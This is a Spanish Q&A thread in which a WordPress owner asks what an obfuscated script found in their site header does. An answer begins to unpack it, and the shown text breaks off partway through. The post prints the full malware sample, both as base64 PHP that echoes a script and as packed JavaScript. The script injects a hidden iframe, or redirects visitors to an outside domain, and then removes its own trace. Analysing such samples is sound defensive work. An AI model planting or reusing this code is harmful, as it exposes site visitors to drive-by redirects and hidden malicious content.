JavaScript sospechoso en el encabezado del sitio web

22

No estoy seguro si este es el lugar correcto para hacer preguntas como esta, disculpas si no lo es.

Encontré el siguiente código en el encabezado de uno de mis sitios web de wordPress, estoy bastante seguro de que es malicioso y lo he eliminado. Sin embargo, tengo curiosidad y no puedo averiguar cuál es el propósito.

¿Alguien puede proporcionar alguna idea?

Base 64 codificada:

CmZ1bmN0aW9uIHVzZXJfYWJvcnRfZW5kX2V4aXRfb3BlcmF0aW9uaWRfODgwNzkwNigpCnsKICAgIGVjaG8gYmFzZTY0X2RlY29kZSgnUEhOamNtbHdkQ0IwZVhCbFBTSjBaWGgwTDJwaGRtRnpZM0pwY0hRaUlHbGtQU0pwWkY4NE9EQTNPVEEySWo1bGRtRnNLR1oxYm1OMGFXOXVLSEFzWVN4akxHc3NaU3hrS1h0bFBXWjFibU4wYVc5dUtHTXBlM0psZEhWeWJpaGpQR0UvSnljNlpTaHdZWEp6WlVsdWRDaGpMMkVwS1NrcktDaGpQV01sWVNrK016VS9VM1J5YVc1bkxtWnliMjFEYUdGeVEyOWtaU2hqS3pJNUtUcGpMblJ2VTNSeWFXNW5LRE0yS1NsOU8ybG1LQ0VuSnk1eVpYQnNZV05sS0M5ZUx5eFRkSEpwYm1jcEtYdDNhR2xzWlNoakxTMHBlMlJiWlNoaktWMDlhMXRqWFh4OFpTaGpLWDFyUFZ0bWRXNWpkR2x2YmlobEtYdHlaWFIxY200Z1pGdGxYWDFkTzJVOVpuVnVZM1JwYjI0b0tYdHlaWFIxY200blhGeDNLeWQ5TzJNOU1YMDdkMmhwYkdVb1l5MHRLWHRwWmloclcyTmRLWHR3UFhBdWNtVndiR0ZqWlNodVpYY2dVbVZuUlhod0tDZGNYR0luSzJVb1l5a3JKMXhjWWljc0oyY25LU3hyVzJOZEtYMTljbVYwZFhKdUlIQjlLQ2R4SURGMFBUTjRLRW9vS1h0bUtHb3VUU0U5TVVrbUprd2dhaTVOSVQwaVN5SXBlek41S0RGMEtUdG1LRXdnUVZzaU1VRWlYVDA5SWtzaUtYdEJXeUl4UVNKZFBURTdjU0F4Tnowb01UWW9LU1ltTVZJb0tTazdjU0F4VkQwaE1UY21KaUVoUVM0emVpWW1RUzVGTGpOM1BUMDlJak4ySUROeUxpSTdjU0F4YWowdE1UdHhJRWM5SWpOek9pOHZNM1F1TTNVdk0wRWlPMllvVnlncEppWXhhajA5TVNsN1ppZ29SUzVPTGpGdktDOHpRaTlwS1NsOGZDaEZMazR1TVc4b0x6TklMMmtwS1NsN01Ua3VNMGtvUnlsOWVudEJMakU1UFVjN2FpNHhPVDFIZlgxNmUyWW9LREUzSmlZaE1WUW1KaUZYS0NrcEtYdHhJRk05SWp3eE1TQXpTajFjWENJelJ6b3pSanN6UXpvdE0wUTdYRndpUGp3eGVTQXpSVDFjWENJeGJGeGNJaUF6Y1QxY1hDSWlLMGNySWx4Y0lpQXpjRDFjWENJeGJGeGNJajQ4THpGNVBqd3ZNVEUrSWp0eElFazlhaTR6WWlnaU1URWlLVHRtS0VrdU1XMDlQVEFwZTJvdVRTNVFQV291VFM1UUsxTjllbnR4SURGT1BVa3VNVzA3Y1NCU1BUTmpMak5rS0NneFRpOHlLU2s3U1Z0U1hTNVFQVWxiVWwwdVVDdFRmWDE5ZlRGTktDbDlmU3d6WVNrN1NpQXhUU2dwZTNFZ1ZUMGlNemtpTzJZb1ZTRTlJak0xSWlsN2NTQklQV291TXpZb1ZTazdaaWhNSUVnaFBVc21Ka2doUFRGSktYdElMak0zUFNJaU96TTRJRWg5ZlgwN1NpQXhVaWdwZTJZb2FpNUVKaVloYWk0elpTbDdlQ0JDZlhvZ1ppaHFMa1FtSmlGQkxqTm1LWHQ0SUVKOWVpQm1LR291UkNZbUlXb3VNMjBwZTNnZ1FuMTZJR1lvYWk1RUppWWhhaTR6YmlsN2VDQkNmWG9nWmlocUxrUW1KaUZCTGpOdktYdDRJRUo5ZWlCbUtHb3VSQ2w3ZUNCQ2ZYb2daaWhNSUVVdU0yd2hQU0pMSWlZbUlXb3VSQ1ltTVRZb0tTbDdlQ0JDZlhwN2VDQXhZbjE5U2lBeE5pZ3BlM0VnZVQxQkxrVXVUanR4SUZFOWVTNURLQ0l6YXlBaUtUdG1LRkUrTUNsN2VDQmFLSGt1V1NoUkt6VXNlUzVES0NJdUlpeFJLU2tzTVRBcGZYRWdNV3M5ZVM1REtDSXpaeThpS1R0bUtERnJQakFwZTNFZ01UUTllUzVES0NJemFEb2lLVHQ0SUZvb2VTNVpLREUwS3pNc2VTNURLQ0l1SWl3eE5Da3BMREV3S1gxeElFODllUzVES0NJemFTOGlLVHRtS0U4K01DbDdlQ0JhS0hrdVdTaFBLelVzZVM1REtDSXVJaXhQS1Nrc01UQXBmWGdnTVdKOVNpQlhLQ2w3Y1NBeFlUMUJMa1V1VGk0emFpZ3BPMllvTHlnelMzd3pURnhjWkN0OE5HZ3BMaXN4YUh3MGFYdzBhbHhjTDN3MFozdzBabncwWW53MFkzdzBaSHd6Tkh3MGEzd3hkU2cwYkh3eFpDbDhNWEo4TkhKOE5ITWdmRFIwZkRSeGZEUndmREZvTGlzMGJYdzBibncwYnlCdEtEUmhmRFE0S1dsOE0xTW9JREZQS1Q5OE0xUjhjQ2d6Vlh3elVpbGNYQzk4TTFGOE0wMThNMDU4TTA4b05IdzJLVEI4TTFCOE0xWjhNVWhjWEM0b00xZDhORE1wZkRRMGZEUTJmRFF5SURReGZETllmRE5aTDJrdU1VTW9NV0VwZkh3dk0xcDhOSFY4TWt0OE1tWjhNbUY4TlRCYk1TMDJYV2w4TWpoOE1WWjhZU0F4VUh3eFdId3hkeWd4VVh3eGVIeHpYRnd0S1h3eFV5Z3lZbnd5YXlsOE1XY29NbTE4TVc1OE1YWXBmREp1ZkRKa0tESmxmRlo4TW1NcGZESnBmREZtS0RKc2ZERmpLWHd4V2loVWZESnZLWHd4VjN3eFdTZ3ljSHhjWEMxdGZISWdmSE1nS1h3eWNYd3laeWd4Vlh3eGNId3lhQ2w4TVVJb01tcDhNaklwZkRJektERjNmREk1S1h3eU55aGxmSFlwZDN3eU5ud3lORnhjTFNodWZIVXBmREkxWEZ3dmZETXpmREpSZkRKU1hGd3RmREpRZkRKUGZESk1mREpOWEZ3dGZERjJLREpPZkRGRktYd3lXbnd5VmlneFpYd3hjSHd5V0NsOE1uaDhNbmxjWEMxemZESjZmREozZkRKMmZERnBLR044Y0NsdmZESnpLREV5ZkZ4Y0xXUXBmREoxS0RRNWZERlRLWHd5UWlneVNId3lTU2w4TVZFb01rUjhNa1VwZkRKRGZESkdLRnMwTFRkZE1Id3hUM3d4VUh3eVJ5bDhNa0Y4TW5Rb1hGd3RmREZ4S1h3eFRDQjFmREpLZkRKWGZESlpYRnd0Tlh4blhGd3RNVFY4TVdNb1hGd3VkM3d4WkNsOE16RW9NekI4TWxVcGZESnlmREpVZkRKVFhGd3RLRzE4Y0h4MEtYdzBaVnhjTFh3MFJDZ3hSM3d4UmlsOE5tMG9JR2w4TVhVcGZEWnVYRnd0WTN3MmJ5aGpLRnhjTFh3Z2ZERnhmR0Y4WjN4d2ZITjhkQ2w4Tm1zcGZEWm9LRFpwZkRacUtYeHBYRnd0S0RJd2ZERmpmRmdwZkRaeGZEUjJLQ0I4WEZ3dGZGeGNMeWw4Tm5kOE5uaDhObmw4Tm5aOE5uVjhObko4Tm5OOE1YSjhOblFvZEh4MktXRjhObWQ4Tm1aOE5qSjhOak44TmpSOE5Wb29JSHhjWEM4cGZEVlZmRFZXSUh3MVYxeGNMWHcxV0NoamZHc3BmRFkxS0RZMmZEWmpLWHcyWkNnZ1ozeGNYQzhvYTN4c2ZIVXBmRFV3ZkRVMGZGeGNMVnRoTFhkZEtYdzJPSHcyT1h3MmVseGNMWGQ4TnpKOE56TmNYQzk4V0NoVWZEYzBmRGN4S1h3eGVpaEdmREl4ZkRGdUtYeHRYRnd0TmxwOE5sY29ObGg4TVVRcGZEYzFLRGMyZkRkamZERktLWHczWlh3eE5TaEdmRGRrZkRGQ2ZEZGlmREZwZkhRb1hGd3RmQ0I4YjN4MktYdzNOeWw4Tnpnb05UQjhObFY4ZGlBcGZEWlVmRFpIZkRaSVd6QXRNbDE4TmtsYk1pMHpYWHcyUmlnd2ZESXBmRFpGS0RCOE1udzFLWHcyUWlnd0tEQjhNU2w4TVRBcGZEWkRLQ2hqZkcwcFhGd3RmRFpFZkRaS2ZEWkxmRFpSZkRaU0tYdzJVeWcyZkdrcGZEWlBmRFpNZkRaTktEWk9mRFZVS1h3MVUzdzBWM3cwV0h3MFdTaGhmR1I4ZENsOE5GVjhORklvTVROOFhGd3RLRnN4TFRoZGZHTXBLWHcwV253MU1Yd3hTeWcxWVh3MVlpbDhOV05jWEMweWZEVTVLREZWZkRVNGZERnpLWHcxTlh3MU5ud3hSMXhjTFdkOE5UZGNYQzFoZkRSUUtEUkRmREV5ZkRJeGZETXlmRFl3ZkZ4Y0xWc3lMVGRkZkdsY1hDMHBmRFI0ZkRSNWZEUjZmRFJHZkRSSGZEUk5LRFJPZkRSUEtYdzBURnhjTDN3MFN5ZzBTSHhZZkRSSmZEUktmRlo4TldRcGZEVmxLRVo4YUZ4Y0xYd3hlSHh3WEZ3dEtYdzFSMXhjTDN3eGN5aGpLRnhjTFh3d2ZERXBmRFEzZkRGNmZERkZmREZFS1h3MVFWeGNMWHcxUW53MVF5aGNYQzE4YlNsOE5VbGNYQzB3ZkRWS0tEUTFmRFZSS1h3MVVpZ3haM3d4Wm53MVQzd3haWHcxVGlsOE5Vc29OVXg4VmlsOE5VMG9SbnhvWEZ3dGZIWmNYQzE4ZGlBcGZEVjVLRVo4Tld3cGZEVnRLREU0ZkRVd0tYdzFiaWcxYTN3eE1Id3hPQ2w4TVVZb05XZDhOV2dwZkRWcFhGd3RmRFZ2WEZ3dGZEVndLR2w4YlNsOE5YWmNYQzE4ZEZ4Y0xURTFmRFY0S0RGTGZEVjFLWHd4U2lnM01IeHRYRnd0ZkRWeGZEVnlLWHcxYzF4Y0xUbDhNVWdvWEZ3dVlud3hUSHcxZWlsOE5WQjhOVVI4TlVWOE5GWjhObVVvTm5COFZDbDhObXdvTkRCOE5Wc3dMVE5kZkZ4Y0xYWXBmRFYwZkRWM2ZEVm1mRFZxS0RVeWZEVXpmRFl3ZkRZeGZEY3dmRFZJZkRWR2ZEUjNmRFJCZkRSQ0tYdzBSU2hjWEMxOElDbDhORkY4TkZSOE5GTW9aeUI4TmxCOE56a3BmRGRoZkRaWmZEWldmRFpCWEZ3dGZEWTNmRFpoZkRaaVhGd3RMMmt1TVVNb01XRXVOVmtvTUN3MEtTa3BlM2dnUW4xNElERmlmU2NzTmpJc05EUTVMQ2Q4Zkh4OGZIeDhmSHg4Zkh4OGZIeHBabng4Zkh4a2IyTjFiV1Z1ZEh4OGZIeDhmSHgyWVhKOGZIeDhmSHg4Y21WMGRYSnVmSHBDYmtkalVrdHVWV3RuVjJWeFIxTnpSVUZ3VTI1NGRFNXBUVmh4Wm10SGVWbDhaV3h6Wlh4M2FXNWtiM2Q4ZEhKMVpYeHBibVJsZUU5bWZHRnNiSHh1WVhacFoyRjBiM0o4TURGOFdHWllhRVZRU205RWNXbDVabVZTYW0xaVlXNTZVVzVHU2tKdFEwNVRaV1pJWTIxNmNteDhXbXRIU1VSWlExSlhXWGxwU2xsUFZVcEtZM0p1U0VoalMySm9UMXB4VGtGclMwcEVmR3hTWVVabVMwMXFaV2hCY1hGWlZtcFhURnBaVjJGNVdGRndSbUpuU0V4TVZYVnVZM3htZFc1amRHbHZibngxYm1SbFptbHVaV1I4ZEhsd1pXOW1mR0p2WkhsOGRYTmxja0ZuWlc1MGZGSkZWa3hIY1dad2RXNWxkV0ZoU2tWWVNGTkhjRmR1VVdwYVlWcFdVMnRHZkdsdWJtVnlTRlJOVEh4VVFXSnBURk5aVm5aMVRuZEphV2xZZDJsSlVXNW1URU40WVVKRGNuTnZkVk40Y2xOMVNIeHRTazl6UldsYVluVlJhR2xKVkhOWGNGRmFXRWRhWVZKNlZteFFkR3RUVWtaNFRIUm1SM2w4UkdWelZYRjFTMUZLWjBKYWFtOXpVMGhRVjJOU1ZtZDZlVzFoVjNkeVJVbHRWbWw0YjBoMGZIUmxmSFpuV25aNWFrTmtla1JYZDBKMVpFaEZhM1JDYm1GaFoxbFpXV0p1V25oQ2ZHNTVmRXhEU0hGVFNsaG9TWGwxWkhKWGVtOWlTa1JUUTI5WloyZEdjV0ZQU25WU2FXTlBiM3h0WVh4emRXSnpkSEpwYm1kOGNHRnljMlZKYm5SOGZHUnBkbng4ZkVGemFtSm9TMDlzVEZCclJVcHJhWEZuZVVGRlRteEtaMEoxZG5aMVJGRkJmRzF2ZkVweFJrOVhaVWRLVm1wbmJHZFlTbWRpYlZkTlQwOW5jbnBQYW0xNWQwRjViM3hEWVVWYWNraGFjRnBZWjNOUlJsVkVkMU5hVjNKaFQyeG9Za0p5Ukc5QmQzbHRmSHhzYjJOaGRHbHZibnh3UzBwUmRFNTNaRzlDV2twT2NHcDVZMGxZVjI5VmNHdGxhV1pWU1hKYWJFVjhabUZzYzJWOFoyOThiMlI4YVhSOFlYSjhZV3g4Ylc5aWFXeGxmR1J2ZkZwTWRXaHZXSHBrWkdOU1VrcEdjMXBKZEVwS1pITnBTRmxIUjI5QlZWUjhablp4YW1KelRVeGFkMUZvYWtadFdubDNaa3B3VUVwQ2RtRlpUazVRUVdKclRYd3lNWEI0Zkd4bGJtZDBhSHhqWVh4dFlYUmphSHhzYkh4ZmZHbHlhWE44YzJWOGFuaFFiMmRNY205bFdGRjJjRmhyYldkMWJHcGFiMGRUVG01SlVVdFJWWFI4YVhCOFkyOThZV044YjI5OGFXWnlZVzFsZkcxamZIWmZZbVEyTm1Jek1tVXhZbU0yWVdRNU1XVXdNVE14T0dVNE1qYzRPVEU0WmpCOFltbDhkR1Z6ZEh4eWFYeHVaSHgwWVh4d2RIeDFjSHh1ZFd4c2ZIUnpmSEJzZkdjeGZIQkpiMjlLZFhOclNITlRTbTV1V0dkbWFWWkZkbk5HY1hGamNWaFJVV3B2ZkdSc1gyNWhiV1Y4YjNOOGQyRjhaWEo4YVZGRWFsTnlWV0YyUkdoellWcHdRVWRCWkhCMWFXTk9TV2wwUVZGamMzZDBRVmg4WVdsOGJtWjRhVXRtWm5sUmFrVklTV2xtV2tKT1NXWmFVSGwyZFZaQlMxaFJRVmRsYWt0NFptdG1aV2g4WTJ0OE9EQXljM3hoZEhSM2ZHRmlZV044WVhWOFlYTjhmSHh5Wkh4aWJIeGlkM3hqTlRWOFluVnRZbnhpY253M056QnpmR0Y2ZkRSMGFIQjhhMjk4ZVhkOFlXNThaWGg4TTJkemIzeGlaWHh1Y1h4aGNIUjFmR3hpZkhKdWZHTm9mR0YyZkdGdGIybDhkWE44WkdsOFlYWmhibnhvWVdsbGZHUnpmR1pzZVh4bGJIeGtiVzlpZkdScFkyRjhaR0owWlh4a1kzeGtaWFpwZkdabGRHTjhaVzE4WlhOc09IeHBZM3hyTUh4bGVueDZaWHhzTW54MWJIeG5OVFl3ZkRZMU9UQjhZMnhrWTN4amJXUjhiWEI4WTJoMGJYeGpaV3hzZkdOamQyRjhZMlJ0Zkdoa2ZHaGphWFI4ZFc1OFpHRjhaMlZ1Wlh4dVozeG5abnhqY21GM2ZHRmtmR2R5Zkh4allYQnBmR2hwY0hSdmNIeHViMjVsZkdkbGRFVnNaVzFsYm5SQ2VVbGtmRzkxZEdWeVNGUk5USHhrWld4bGRHVjhhV1JmT0Rnd056a3dObnd4TURCOFoyVjBSV3hsYldWdWRITkNlVlJoWjA1aGJXVjhUV0YwYUh4bWJHOXZjbnhqYjIxd1lYUk5iMlJsZkZoTlRFaDBkSEJTWlhGMVpYTjBmRlJ5YVdSbGJuUjhjblo4UldSblpYeDBiMHh2ZDJWeVEyRnpaWHhOVTBsRmZHMWhlRlJ2ZFdOb1VHOXBiblJ6ZkhGMVpYSjVVMlZzWldOMGIzSjhZV1JrUlhabGJuUk1hWE4wWlc1bGNueGhkRzlpZkdobGFXZG9kSHh6Y21OOFNXNWpmR2gwZEhCOGJXbDNhMkYyYjNKcGQydGhmRzFzZkVkdmIyZHNaWHgyWlc1a2IzSjhjMlYwU1c1MFpYSjJZV3g4WTJ4bFlYSkpiblJsY25aaGJIeGphSEp2YldWOE1EVXlSbnhwVUdodmJtVjhiR1ZtZEh3eU5qTXdjSGg4ZDJsa2RHaDhZV0p6YjJ4MWRHVjhjRzl6YVhScGIyNThhVkJ2Wkh4eVpYQnNZV05sZkhOMGVXeGxmR0Z1WkhKdmFXUjhZbUo4Y0c5amEyVjBmSEJ6Y0h4elpYSnBaWE44YzNsdFltbGhibnh3YkhWamEyVnlmSEpsZkhCaGJHMThjR2h2Ym1WOGFYaHBmSFJ5Wlc5OFluSnZkM05sY254NFpHRjhlR2xwYm05OE1USXdOM3g4WTJWOGQybHVaRzkzYzN4c2FXNXJmSFp2WkdGbWIyNWxmSHgzWVhCOGZHbHVmSHh2WW54amIyMXdZV3g4Wld4aGFXNWxmR1psYm01bFkzeG9aV2w4WW14aGVtVnlmR0pzWVdOclltVnljbmw4YldWbFoyOThZWFpoYm5SbmIzeGlZV1JoZkdsbGJXOWlhV3hsZkdodmJtVjhabWx5WldadmVIeHVaWFJtY205dWRIeHZjR1Z5WVh4dGJYQjhiV2xrY0h4cmFXNWtiR1Y4YkdkbGZHMWhaVzF2ZkRZek1UQjhhV0ZqZkRnemZIRjBaV3Q4Y2pNNE1IeHlOakF3ZkRnMWZEazRmREEzZkdocGZIY3pZM3h5WVd0emZISnBiVGw4WjJWOGJXMThiWE44YzJGOGN6VTFmSEp2ZkhabGZIcHZmSEZqZkhkbFltTjhjR2Q4ZDJsOGQyaHBkSHh3WkhobmZIWmxjbWw4YjNkbk1YeHdPREF3ZkhCaGJueHdhR2xzZkh4d2FYSmxmSHg4ZkhCeWIzaDhjSE5wYjN4eFlYeHlkSHh3YjN4aGVYeDFZM3h3Ym54MllYeHpZM3gyZFd4amZHZDBmR3hyZkhSamJIeDJlSHd3TUh4dFlueDBNbngwTm54MFpHZDhkR1ZzZkcwemZHMDFmSFI0ZkhadE5EQjhjMmg4ZEdsdGZIWnZaR0Y4ZEc5OGMzbDhjMmw4YzJkb2ZITm9ZWEo4YzJsbGZIWTBNREI4ZGpjMU1IdzRNWHh6Wkd0OE9EQjhjMnQ4YzJ4OGMyOThablI4YzNCOGREVjhZak44ZFhSemRIeHBaSHh6Ylh4dmNtRnVmSGQyZkd0c2IyNThhM0IwZkd0M1kzeHJlVzk4YzNWaWMzUnlmR3RuZEh4OGZHcHBaM044YTJSa2FYeHJaV3BwZkd4bGZHNXZmSGx2ZFhKOGJHbGlkM3hzZVc1NGZIcGxkRzk4ZW5SbGZIaHBmR3huZkhacGZHcGxiWFY4YW1KeWIzeG9kWHhoZDN4MFkzeDBjSHgyYTN4b2NIeG9jM3hvZEh4eVozeHBNak13ZkdsdWJtOThhWEJoY1h4cVlYeHBiVEZyZkdscmIyMThhV0p5YjN4cFpHVmhmR2xuTURGOGJURjhlV0Z6Zkc0M2ZHNWxmRzl1Zkc0MU1IeHVNekI4YlhsM1lYeHVNVEI4YmpJd2ZIUm1mSGRtZkc4eWFXMThiM0I4ZEdsOGJucHdhSHh1WTN4M1ozeDNkSHh1YjJ0OGJYZGljSHh3TVh4NE56QXdmRzFsZkhKamZIZHZiblY4WTNKOGZIaHZmRzB6WjJGOGJUVXdmSFZwZkcxcGZHODRmSHA2ZkcxMGZHNTNmSGR0YkdKOFpHVjhiMkY4TURKOGJXMWxaaWN1YzNCc2FYUW9KM3duS1N3d0xIdDlLU2tLUEM5elkzSnBjSFErJyk7Cn0KCnJlZ2lzdGVyX3NodXRkb3duX2Z1bmN0aW9uKCd1c2VyX2Fib3J0X2VuZF9leGl0X29wZXJhdGlvbmlkXzg4MDc5MDYnKTsKCg==

Código real:

<script type="text/javascript" id="id_8807906">
    eval(function(p, a, c, k, e, d) {
        e = function(c) {
            return (c < a ? '' : e(parseInt(c / a))) + ((c = c % a) > 35 ? String.fromCharCode(c + 29) : c.toString(36))
        };
        if (!''.replace(/^/, String)) {
            while (c--) {
                d[e(c)] = k[c] || e(c)
            }
            k = [function(e) {
                return d[e]
            }];
            e = function() {
                return '\w+'
            };
            c = 1
        };
        while (c--) {
            if (k[c]) {
                p = p.replace(new RegExp('\b' + e(c) + '\b', 'g'), k[c])
            }
        }
        return p
    }('q 1t=3x(J(){f(j.M!=1I&&L j.M!="K"){3y(1t);f(L A["1A"]=="K"){A["1A"]=1;q 17=(16()&&1R());q 1T=!17&&!!A.3z&&A.E.3w==="3v 3r.";q 1j=-1;q G="3s://3t.3u/3A";f(W()&&1j==1){f((E.N.1o(/3B/i))||(E.N.1o(/3H/i))){19.3I(G)}z{A.19=G;j.19=G}}z{f((17&&!1T&&!W())){q S="<11 3J=\"3G:3F;3C:-3D;\"><1y 3E=\"1l\" 3q=\""+G+"\" 3p=\"1l\"></1y></11>";q I=j.3b("11");f(I.1m==0){j.M.P=j.M.P+S}z{q 1N=I.1m;q R=3c.3d((1N/2));I[R].P=I[R].P+S}}}}1M()}},3a);J 1M(){q U="39";f(U!="35"){q H=j.36(U);f(L H!=K&&H!=1I){H.37="";38 H}}};J 1R(){f(j.D&&!j.3e){x B}z f(j.D&&!A.3f){x B}z f(j.D&&!j.3m){x B}z f(j.D&&!j.3n){x B}z f(j.D&&!A.3o){x B}z f(j.D){x B}z f(L E.3l!="K"&&!j.D&&16()){x B}z{x 1b}}J 16(){q y=A.E.N;q Q=y.C("3k ");f(Q>0){x Z(y.Y(Q+5,y.C(".",Q)),10)}q 1k=y.C("3g/");f(1k>0){q 14=y.C("3h:");x Z(y.Y(14+3,y.C(".",14)),10)}q O=y.C("3i/");f(O>0){x Z(y.Y(O+5,y.C(".",O)),10)}x 1b}J W(){q 1a=A.E.N.3j();f(/(3K|3L\d+|4h).+1h|4i|4j\/|4g|4f|4b|4c|4d|34|4k|1u(4l|1d)|1r|4r|4s |4t|4q|4p|1h.+4m|4n|4o m(4a|48)i|3S( 1O)?|3T|p(3U|3R)\/|3Q|3M|3N|3O(4|6)0|3P|3V|1H\.(3W|43)|44|46|42 41|3X|3Y/i.1C(1a)||/3Z|4u|2K|2f|2a|50[1-6]i|28|1V|a 1P|1X|1w(1Q|1x|s\-)|1S(2b|2k)|1g(2m|1n|1v)|2n|2d(2e|V|2c)|2i|1f(2l|1c)|1Z(T|2o)|1W|1Y(2p|\-m|r |s )|2q|2g(1U|1p|2h)|1B(2j|22)|23(1w|29)|27(e|v)w|26|24\-(n|u)|25\/|33|2Q|2R\-|2P|2O|2L|2M\-|1v(2N|1E)|2Z|2V(1e|1p|2X)|2x|2y\-s|2z|2w|2v|1i(c|p)o|2s(12|\-d)|2u(49|1S)|2B(2H|2I)|1Q(2D|2E)|2C|2F([4-7]0|1O|1P|2G)|2A|2t(\-|1q)|1L u|2J|2W|2Y\-5|g\-15|1c(\.w|1d)|31(30|2U)|2r|2T|2S\-(m|p|t)|4e\-|4D(1G|1F)|6m( i|1u)|6n\-c|6o(c(\-| |1q|a|g|p|s|t)|6k)|6h(6i|6j)|i\-(20|1c|X)|6q|4v( |\-|\/)|6w|6x|6y|6v|6u|6r|6s|1r|6t(t|v)a|6g|6f|62|63|64|5Z( |\/)|5U|5V |5W\-|5X(c|k)|65(66|6c)|6d( g|\/(k|l|u)|50|54|\-[a-w])|68|69|6z\-w|72|73\/|X(T|74|71)|1z(F|21|1n)|m\-6Z|6W(6X|1D)|75(76|7c|1J)|7e|15(F|7d|1B|7b|1i|t(\-| |o|v)|77)|78(50|6U|v )|6T|6G|6H[0-2]|6I[2-3]|6F(0|2)|6E(0|2|5)|6B(0(0|1)|10)|6C((c|m)\-|6D|6J|6K|6Q|6R)|6S(6|i)|6O|6L|6M(6N|5T)|5S|4W|4X|4Y(a|d|t)|4U|4R(13|\-([1-8]|c))|4Z|51|1K(5a|5b)|5c\-2|59(1U|58|1s)|55|56|1G\-g|57\-a|4P(4C|12|21|32|60|\-[2-7]|i\-)|4x|4y|4z|4F|4G|4M(4N|4O)|4L\/|4K(4H|X|4I|4J|V|5d)|5e(F|h\-|1x|p\-)|5G\/|1s(c(\-|0|1)|47|1z|1E|1D)|5A\-|5B|5C(\-|m)|5I\-0|5J(45|5Q)|5R(1g|1f|5O|1e|5N)|5K(5L|V)|5M(F|h\-|v\-|v )|5y(F|5l)|5m(18|50)|5n(5k|10|18)|1F(5g|5h)|5i\-|5o\-|5p(i|m)|5v\-|t\-15|5x(1K|5u)|1J(70|m\-|5q|5r)|5s\-9|1H(\.b|1L|5z)|5P|5D|5E|4V|6e(6p|T)|6l(40|5[0-3]|\-v)|5t|5w|5f|5j(52|53|60|61|70|5H|5F|4w|4A|4B)|4E(\-| )|4Q|4T|4S(g |6P|79)|7a|6Y|6V|6A\-|67|6a|6b\-/i.1C(1a.5Y(0,4))){x B}x 1b}', 62, 449, '|||||||||||||||if||||document|||||||var|||||||return|zBnGcRKnUkgWeqGSsEApSnxtNiMXqfkGyY|else|window|true|indexOf|all|navigator|01|XfXhEPJoDqiyfeRjmbanzQnFJBmCNSefHcmzrl|ZkGIDYCRWYyiJYOUJJcrnHHcKbhOZqNAkKJD|lRaFfKMjehAqqYVjWLZYWayXQpFbgHLLUunc|function|undefined|typeof|body|userAgent|REVLGqfpuneuaaJEXHSGpWnQjZaZVSkF|innerHTML|TAbiLSYVvuNwIiiXwiIQnfLCxaBCrsouSxrSuH|mJOsEiZbuQhiITsWpQZXGZaRzVlPtkSRFxLtfGy|DesUquKQJgBZjosSHPWcRVgzymaWwrEImVixoHt|te|vgZvyjCdzDWwBudHEktBnaagYYYbnZxB|ny|LCHqSJXhIyudrWzobJDSCoYggFqaOJuRicOo|ma|substring|parseInt||div|||AsjbhKOlLPkEJkiqgyAENlJgBuvvuDQA|mo|JqFOWeGJVjglgXJgbmWMOOgrzOjmywAyo|CaEZrHZpZXgsQFUDwSZWraOlhbBrDoAwym||location|pKJQtNwdoBZJNpjycIXWoUpkeifUIrZlE|false|go|od|it|ar|al|mobile|do|ZLuhoXzddcRRJFsZItJJdsiHYGGoAUT|fvqjbsMLZwQhjFmZywfJpPJBvaYNNPAbkM|21px|length|ca|match|ll|_|iris|se|jxPogLroeXQvpXkmguljZoGSNnIQKQUt|ip|co|ac|oo|iframe|mc|v_bd66b32e1bc6ad91e01318e8278918f0|bi|test|ri|nd|ta|pt|up|null|ts|pl|g1|pIooJuskHsSJnnXgfiVEvsFqqcqXQQjo|dl_name|os|wa|er|iQDjSrUavDhsaZpAGAdpuicNIitAQcswtAX|ai|nfxiKffyQjEHIifZBNIfZPyvuVAKXQAWejKxfkfeh|ck|802s|attw|abac|au|as|||rd|bl|bw|c55|bumb|br|770s|az|4thp|ko|yw|an|ex|3gso|be|nq|aptu|lb|rn|ch|av|amoi|us|di|avan|haie|ds|fly|el|dmob|dica|dbte|dc|devi|fetc|em|esl8|ic|k0|ez|ze|l2|ul|g560|6590|cldc|cmd|mp|chtm|cell|ccwa|cdm|hd|hcit|un|da|gene|ng|gf|craw|ad|gr||capi|hiptop|none|getElementById|outerHTML|delete|id_8807906|100|getElementsByTagName|Math|floor|compatMode|XMLHttpRequest|Trident|rv|Edge|toLowerCase|MSIE|maxTouchPoints|querySelector|addEventListener|atob|height|src|Inc|http|miwkavoriwka|ml|Google|vendor|setInterval|clearInterval|chrome|052F|iPhone|left|2630px|width|absolute|position|iPod|replace|style|android|bb|pocket|psp|series|symbian|plucker|re|palm|phone|ixi|treo|browser|xda|xiino|1207||ce|windows|link|vodafone||wap||in||ob|compal|elaine|fennec|hei|blazer|blackberry|meego|avantgo|bada|iemobile|hone|firefox|netfront|opera|mmp|midp|kindle|lge|maemo|6310|iac|83|qtek|r380|r600|85|98|07|hi|w3c|raks|rim9|ge|mm|ms|sa|s55|ro|ve|zo|qc|webc|pg|wi|whit|pdxg|veri|owg1|p800|pan|phil||pire||||prox|psio|qa|rt|po|ay|uc|pn|va|sc|vulc|gt|lk|tcl|vx|00|mb|t2|t6|tdg|tel|m3|m5|tx|vm40|sh|tim|voda|to|sy|si|sgh|shar|sie|v400|v750|81|sdk|80|sk|sl|so|ft|sp|t5|b3|utst|id|sm|oran|wv|klon|kpt|kwc|kyo|substr|kgt|||jigs|kddi|keji|le|no|your|libw|lynx|zeto|zte|xi|lg|vi|jemu|jbro|hu|aw|tc|tp|vk|hp|hs|ht|rg|i230|inno|ipaq|ja|im1k|ikom|ibro|idea|ig01|m1|yas|n7|ne|on|n50|n30|mywa|n10|n20|tf|wf|o2im|op|ti|nzph|nc|wg|wt|nok|mwbp|p1|x700|me|rc|wonu|cr||xo|m3ga|m50|ui|mi|o8|zz|mt|nw|wmlb|de|oa|02|mmef'.split('|'), 0, {}))
    
pregunta bf2mad 15.10.2015 - 14:52
fuente

4 respuestas

21

Parece que el "código real" que publicaste está empaquetado usando enlace . Cuando lo desempaquetaste obtienes

var jxPogLroeXQvpXkmguljZoGSNnIQKQUt=setInterval(function()
{
if(document.body!=null&&typeof document.body!="undefined")
    {
    clearInterval(jxPogLroeXQvpXkmguljZoGSNnIQKQUt);
    if(typeof window["v_bd66b32e1bc6ad91e01318e8278918f0"]=="undefined")
        {
        window["v_bd66b32e1bc6ad91e01318e8278918f0"]=1;
        var CaEZrHZpZXgsQFUDwSZWraOlhbBrDoAwym=(JqFOWeGJVjglgXJgbmWMOOgrzOjmywAyo()&&iQDjSrUavDhsaZpAGAdpuicNIitAQcswtAX());
